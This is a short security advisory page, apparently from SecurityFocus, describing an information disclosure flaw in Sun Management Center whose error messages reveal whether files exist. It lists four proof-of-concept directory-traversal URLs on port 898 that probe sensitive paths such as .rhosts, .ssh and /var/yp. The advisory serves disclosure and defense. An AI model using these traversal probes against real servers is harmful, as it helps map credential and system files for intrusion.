Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Sun Management Center Error Message Information Disclosure Vulnerability

The following proofs-of-concept has been made available:

http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp

These examples were return different error messages based on whether the requested resource exists or not.







 

Privacy Statement
Copyright 2009, SecurityFocus